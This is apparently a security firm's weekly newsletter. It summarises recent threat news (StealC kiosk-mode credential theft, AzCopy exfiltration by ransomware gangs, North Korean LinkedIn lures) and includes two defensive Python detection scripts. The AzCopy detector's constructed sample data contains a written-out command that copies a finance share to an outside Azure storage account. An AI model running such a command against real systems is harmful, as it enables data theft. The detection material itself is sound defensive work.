Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Malware Locks Web Browser in Kiosk Mode to Steal Credentials
A new malware campaign locks users in their browser’s kiosk mode to steal Google credentials.
Top 4 takeaways:
🪲 The malware launches the browser in kiosk mode, making it full-screen and preventing navigation away from the login page. The user is then forced to enter their credentials to “unlock” the browser.
🪪 Once credentials are saved, the StealC malware steals them from the browser’s credential store.
⚡️ The technique is implemented using an AutoIt script, which identifies available browsers and launches them in kiosk mode targeting specific services like Google.
🛡️ Users should avoid entering sensitive information and use hotkey combinations or Task Manager to close the browser. If necessary, perform a hard reset and run a full antivirus scan.
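As an added illustration of the detection side of this story (example code written for this newsletter, not from the campaign reporting), the script below scores process-creation events for browsers started in kiosk mode. Kiosk mode is a legitimate feature, so the signal is the combination: a browser launched with Chromium's --kiosk or Firefox's -kiosk switch by a script interpreter such as AutoIt3.exe, pointed at a sign-in page. The browser list, parent lists, sign-in hosts and sample events are assumptions and constructed data, not telemetry from the campaign.

```python
"""Triage browser launches in kiosk mode from constructed process-creation events."""
import shlex
from dataclasses import dataclass
from urllib.parse import urlparse

# Chromium-based browsers accept --kiosk; Firefox accepts -kiosk (both real switches).
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
KIOSK_SWITCHES = {"--kiosk", "-kiosk"}
# Parents that normally start a browser for an interactive user (assumption for this example).
BENIGN_PARENTS = {"explorer.exe", "userinit.exe"}
# Script interpreters and shells; a browser spawned by one of these deserves a look.
SCRIPT_HOSTS = {"autoit3.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Sign-in pages whose credentials the browser would offer to save (assumption).
CREDENTIAL_HOSTS = {"accounts.google.com", "login.microsoftonline.com"}


@dataclass
class ProcessEvent:
    pid: int
    image: str         # file name of the new process
    parent_image: str  # file name of its parent
    command_line: str


def kiosk_target(command_line):
    """Return the URL a kiosk-mode launch points at ('' if none), or None when not kiosk mode."""
    tokens = shlex.split(command_line, posix=False)  # keeps Windows paths and quotes intact
    # Exact match: --kiosk-printing is a different, unrelated Chromium switch.
    if not any(t.lower() in KIOSK_SWITCHES for t in tokens[1:]):
        return None
    for t in tokens[1:]:
        if t.lower().startswith(("http://", "https://")):
            return t.strip('"')
    return ""


def assess(ev):
    """Score one event; returns (severity, reason) or None when nothing is notable."""
    if ev.image.lower() not in BROWSERS:
        return None
    url = kiosk_target(ev.command_line)
    if url is None:
        return None
    parent = ev.parent_image.lower()
    host = (urlparse(url).hostname or "").lower()
    if parent in SCRIPT_HOSTS and host in CREDENTIAL_HOSTS:
        return ("high", f"kiosk-mode launch of {host} by script host {ev.parent_image}")
    if parent not in BENIGN_PARENTS:
        return ("medium", f"kiosk-mode launch by unexpected parent {ev.parent_image}")
    return ("low", "kiosk-mode launch from the shell; confirm it is expected (signage, lab PC)")


def triage(events):
    """Return [(pid, severity, reason), ...] for every event that scored."""
    alerts = []
    for ev in events:
        hit = assess(ev)
        if hit:
            alerts.append((ev.pid, *hit))
    return alerts


# Constructed sample telemetry; paths, hosts and PIDs are made up for this example.
SAMPLE_EVENTS = [
    ProcessEvent(101, "chrome.exe", "AutoIt3.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk https://accounts.google.com/ServiceLogin'),
    ProcessEvent(102, "msedge.exe", "explorer.exe",
                 "msedge.exe --kiosk https://intranet.example.local/dashboard"),
    ProcessEvent(103, "chrome.exe", "explorer.exe",
                 "chrome.exe https://www.example.com/"),
    ProcessEvent(104, "firefox.exe", "wscript.exe",
                 "firefox.exe -kiosk https://accounts.google.com/"),
    ProcessEvent(105, "msedge.exe", "outlook.exe",
                 "msedge.exe --kiosk-printing https://www.example.com/report"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The severity ladder keeps the rule useful in environments that run kiosk browsers on purpose: a launch from the shell only gets a low-priority note, while a script host pointing a kiosk browser at a sign-in page is the pattern described above and is rated high.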
North Korean Hackers Use LinkedIn and Coding Challenges to Spread Malware
North Korean threat actors are targeting cryptocurrency users on LinkedIn with malware called RustDoor.
Top 4 takeaways:
💬 The FBI issued a public service announcement warning the crypto industry about targeted attacks by North Korea using social engineering techniques.
🥸 Attackers use professional networking platforms to impersonate recruiters and deliver malware through coding challenges.
🪲 The malware is delivered through booby-trapped Visual Studio projects and includes backdoor functionalities.
🛡️ It’s crucial to train employees to be cautious about unsolicited contacts on social media and to avoid running unknown software.
Azure Storage Explorer Now Abused by Ransomware Gangs
Ransomware gangs like BianLian and Rhysida are using Microsoft’s Azure Storage Explorer and AzCopy to steal data from breached networks and store it in Azure Blob storage.
Top 4 takeaways:
🎯 Azure’s trusted status, scalability, and performance make it an attractive option for attackers to exfiltrate large volumes of data quickly and undetected.
⚙️ Azure Storage Explorer, typically used for managing Azure storage, is being repurposed by threat actors for large-scale data transfers to cloud storage.
🪵 Log files created by Storage Explorer and AzCopy can help investigators determine what data was stolen and identify other potential payloads.
🛡️ Recommended defenses include monitoring for AzCopy execution, outbound traffic to Azure Blob Storage endpoints, and setting alarms for unusual file copying or access patterns.
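The monitoring advice in the last takeaway, worked through as an added example (written here for the newsletter, not code from the reporting or from Microsoft): the script correlates process-creation and network-connection events, flags AzCopy or Storage Explorer running on a machine that is not approved to run them, and totals outbound bytes to Azure Blob endpoints per storage account so that bulk transfers to an account the organisation does not own stand out. The approved host and account lists, the volume threshold and the sample events are assumptions and constructed data; the `azcopy copy ... --recursive` form in the sample is real AzCopy syntax, and the alert text redacts the SAS signature so the alert itself does not carry a usable token.

```python
"""Flag AzCopy / Storage Explorer use and bulk outbound transfers to Azure Blob endpoints."""
import re
from collections import defaultdict

BLOB_SUFFIX = ".blob.core.windows.net"          # public Azure Blob endpoint suffix
TRANSFER_TOOLS = {"azcopy.exe", "storageexplorer.exe"}

# Assumptions for this example: which machines may run the tools, which storage
# accounts belong to the organisation, and how much outbound data counts as bulk.
APPROVED_HOSTS = {"BK01"}
APPROVED_ACCOUNTS = {"corpbackup"}
THRESHOLD_BYTES = 1 * 2**30  # 1 GiB to a non-approved account


def storage_account(hostname):
    """Return the storage account name for an Azure Blob endpoint, else None."""
    h = hostname.lower()
    if h.endswith(BLOB_SUFFIX) and len(h) > len(BLOB_SUFFIX):
        return h[: -len(BLOB_SUFFIX)]
    return None


def redact_sas(text):
    """Blank the signature of any shared access signature in a command line or URL."""
    return re.sub(r"""sig=[^&\s"']+""", "sig=<redacted>", text)


def find_exfil(events, approved_hosts=APPROVED_HOSTS, approved_accounts=APPROVED_ACCOUNTS,
               threshold_bytes=THRESHOLD_BYTES):
    """Return [(host, kind, detail), ...]; kind is 'tool' or 'volume'."""
    alerts = []
    outbound = defaultdict(int)  # (host, image, account) -> bytes sent
    for ev in events:
        if ev["type"] == "process":
            if ev["image"].lower() in TRANSFER_TOOLS and ev["host"] not in approved_hosts:
                alerts.append((ev["host"], "tool",
                               f"{ev['image']} run on non-approved host: {redact_sas(ev['cmd'])}"))
        elif ev["type"] == "netconn":
            account = storage_account(ev["dest"])
            if account and account not in approved_accounts:
                outbound[(ev["host"], ev["image"].lower(), account)] += ev["bytes_out"]
    for (host, image, account), total in sorted(outbound.items()):
        if total >= threshold_bytes:
            alerts.append((host, "volume",
                           f"{image} sent {total / 2**30:.1f} GiB to non-approved account {account}"))
    return alerts


# Constructed EDR-style events; host names, account names and the SAS token are made up.
SAMPLE_EVENTS = [
    {"host": "FS01", "type": "process", "image": "azcopy.exe",
     "cmd": 'azcopy.exe copy "D:\\Shares\\Finance" '
            '"https://stg7x.blob.core.windows.net/in?sv=2022-11-02&ss=b&sig=k3yM4teri4l" --recursive'},
    {"host": "FS01", "type": "netconn", "image": "azcopy.exe",
     "dest": "stg7x.blob.core.windows.net", "port": 443, "bytes_out": 41_000_000_000},
    {"host": "BK01", "type": "process", "image": "azcopy.exe",
     "cmd": 'azcopy.exe copy "E:\\Backups" "https://corpbackup.blob.core.windows.net/nightly" --recursive'},
    {"host": "BK01", "type": "netconn", "image": "azcopy.exe",
     "dest": "corpbackup.blob.core.windows.net", "port": 443, "bytes_out": 120_000_000_000},
    {"host": "WS22", "type": "netconn", "image": "msedge.exe",
     "dest": "stg7x.blob.core.windows.net", "port": 443, "bytes_out": 12_000},
]

if __name__ == "__main__":
    for alert in find_exfil(SAMPLE_EVENTS):
        print(alert)
```

Keying the volume total on the storage account rather than on the tool is deliberate: the same trusted endpoint is what makes this technique attractive, so a legitimate backup host pushing 120 GB to the organisation's own account produces nothing, while 41 GB from a file server to an account nobody approved does, whichever binary moved it.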
Exploding Pagers Target Hezbollah Members
At least nine people were killed after pagers used by Hezbollah members exploded across Lebanon. Over 2,750 people were injured, with more than 200 critically wounded.
Top 4 takeaways:
💬 Hezbollah has accused Israel of causing the explosions, suggesting the devices were intercepted and rigged with detonators.
🚑 The Lebanese Red Cross has deployed 130 ambulances and over 500 EMTs to manage the aftermath and issued an urgent call for blood donors.
📅 The incident is compared to a 1996 event where Israeli intelligence agents killed Hamas’ chief bomb maker by detonating explosives in his cellphone.
🕵️ Post-Snowden leaks have shown how easy it is for governments to intercept technology purchases and add software or whatever else they like. But doing this on such a large scale indicates an unprecedented intelligence coup.
Europol Dismantles Encrypted Communications Platform “Ghost”
Europol and law enforcement from nine countries successfully dismantled the encrypted communications platform “Ghost,” used by organized crime for activities like drug trafficking and money laundering.
Top 4 takeaways:
🔐 Ghost offered advanced security features, including three encryption layers and a message self-destruction system, with subscriptions costing $2,350 for six months.
👻 Ghost was allegedly used for trafficking drugs, money laundering, and ordering killings.
👮 The investigation, which began in March 2022, led to the discovery of Ghost’s servers and assets, resulting in 51 arrests across multiple countries.
😬 The dismantling of Ghost and similar platforms has fragmented the encrypted communications landscape, making it more challenging for law enforcement to track criminal activities.
Top Tips of the Week
Threat Intelligence
- Conduct threat intelligence awareness sessions. Ensure that all team members understand the value and application of threat intel.
Threat Hunting
- Foster a proactive mindset in threat hunting. Be the hunter, not the hunted. Anticipate and neutralize potential threats.
- Embrace a proactive mindset in cyber threat hunting. Anticipate and neutralize potential threats before they escalate.
- Utilize threat intelligence for risk assessment in cyber threat hunting. Identify and prioritize potential risks to allocate resources effectively.
Custom Tooling
- Collaborate with threat modeling teams during custom tool development. Identify potential risks and vulnerabilities to strengthen security measures.
- Implement secure coding practices in custom tool development. Address vulnerabilities at the code level to enhance overall security.
- Regularly communicate updates about custom tools to your team. Keep stakeholders informed about enhancements and changes.
Feature Article
Analyzing cyber threat intelligence can be hard. You are often overwhelmed with data, drowned in overlapping connections, and unclear where to start or when to finish your analysis. To help guide their analysts through the maze, intelligence organizations across the globe use the intelligence lifecycle.
The intelligence lifecycle is a structured approach to collecting, analyzing, and distributing intelligence. It acts as a template that analysts can follow to produce or consume intelligence. The cyber security industry has adapted this lifecycle to suit its needs by creating the cyber threat intelligence (CTI) lifecycle.
This article is your essential guide to the CTI lifecycle. You will learn about its six stages, how this model is used in the real world, and how you can get the most out of it. Let’s jump in!
Learning Resources
Edit Your Videos Faster!
Creating content and teaching others is a great way to solidify your understanding of a topic. If you want to do this by making videos, watch this!
In this presentation, MrAlexTech explores editing efficiently in DaVinci Resolve. It covers various tips, tricks, and workflows to speed up the editing process, making it more accessible and manageable for everyone.
Discover How to Scrape Telegram Using Python
Scripting skills are essential if you want a long and fulfilling career in cyber security.
This video (by the legendary John Hammond) demonstrates how to scrape Telegram channels and messages using Python, specifically with the Telethon library. It covers installation, setup, and basic usage, including sending messages and joining channels.
Use this video as a stepping stone to create your own web scrapers in Python!
How Do You Manage Your Time?
Time management is a skill we all must master to combat the hustle and bustle of 21st-century living. This is especially true if you are an entrepreneur, have a side hustle, or are trying to make a career change.
This video discusses managing time effectively as an entrepreneur, focusing on strategies from Dan Martell’s book “Buy Back Your Time.” These include overcoming the pain line in business growth, the buyback loop, the drip matrix, and the three trades that matter.
I highly recommend watching this and then picking up a copy of the book!
Master Active Directory Today!
To master attacking or defending large organizations, you need to know Active Directory.
This video is a beginner’s guide to Active Directory. Dale Hobbs does an excellent job covering the basics, such as objects, architecture, trusts, group policy, certificates, and more.
He also explores common issues and challenges IT teams face when setting up and using Active Directory at scale, along with best practices for keeping it secure.
Personal Notes
🤔 Back to video creation!
This week at Kraven, we have been getting back to turning our written content into videos. We have been scripting, filming, and editing new videos for our MISP series!
Video creation takes a completely different skill set than creating written content. This has made adding videos to our repertoire of free learning resources fun and challenging. It has been a steep learning curve, but we are improving our process and quality with every new video.
I look forward to sharing what we have created over the next few weeks.